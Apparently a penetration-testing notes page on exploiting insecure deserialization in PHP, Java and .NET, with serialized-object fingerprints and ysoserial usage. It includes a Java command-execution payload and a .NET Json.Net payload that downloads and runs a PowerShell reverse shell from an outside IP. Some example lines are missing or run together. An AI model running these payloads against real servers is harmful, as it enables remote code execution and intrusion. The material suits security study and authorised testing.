Serialization is the process of turning some object into a data format that can be restored later. People often serialize objects in order to save them to storage, or to send as part of communications.
Deserialization is the reverse of that process, taking data structured from some format, and rebuilding it into an object. Today, the most popular data format for serializing data is JSON. Before that, it was XML.
In many ocations you can find some code in the server side that unserialize some object given by the user. In this case, you can send a malicious payload to make the server side behave unexpectedly.
You should read: https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html for learn how to attack.
For example, in PHP any function of a class that starts with "__" will be executed when an object of that class is deserialized. So, setting some values for the attributes of that class could allow you to execute code.
You can read an explained PHP example here: https://www.notsosecure.com/remote-code-execution-via-php-unserialize/
If you find some parameter being sent to the server like:
You could have found a vulnerable java application. Firgerprints of java serialized objects:
AC ED 00 05 in Hex
rO0 in Base64
Content-type header of an HTTP response set to
You can exploit it using ysoserial. Download from the git the newest ysoserial.jar file and create a payload doing:
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections5 'cmd /c ping -n 1 10.10.14.0'
Check for common-collections and "InvokerTransformer" inside the application files:
cd /pat/applicationgrep -R InvokerTransformer .
Java LOVES sending serialized objects all over the place. For example:
In HTTP requests – Parameters, ViewState, Cookies, you name it.
RMI – The extensively used Java RMI protocol is 100% based on serialization
RMI over HTTP – Many Java thick client web apps use this – again 100% serialized objects
JMX – Again, relies on serialized objects being shot over the wire
Custom Protocols – Sending an receiving raw Java objects is the norm – which we’ll see in some of the exploits to come
You could also exploit serialised objects in .Net.
To created the payloads you can use: https://github.com/pwntester/ysoserial.net This tool is a little bit different from Javas one because it can generate Payloads in Binary format (like java ysoserial), in XML and in JSON. For identifying binary format in Base64 you should look for the initial string: AAEAAAD/////
For example, you could create a payload in JSON to execute a PS reverse shell with:
ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "powershell \"IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9/powercat.ps1')\"" -t
Take a look to this POST about how to try to exploit the __ViewState parameter of .Net to execute arbitrary code.
More info about .Net deserialization on this paper: https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf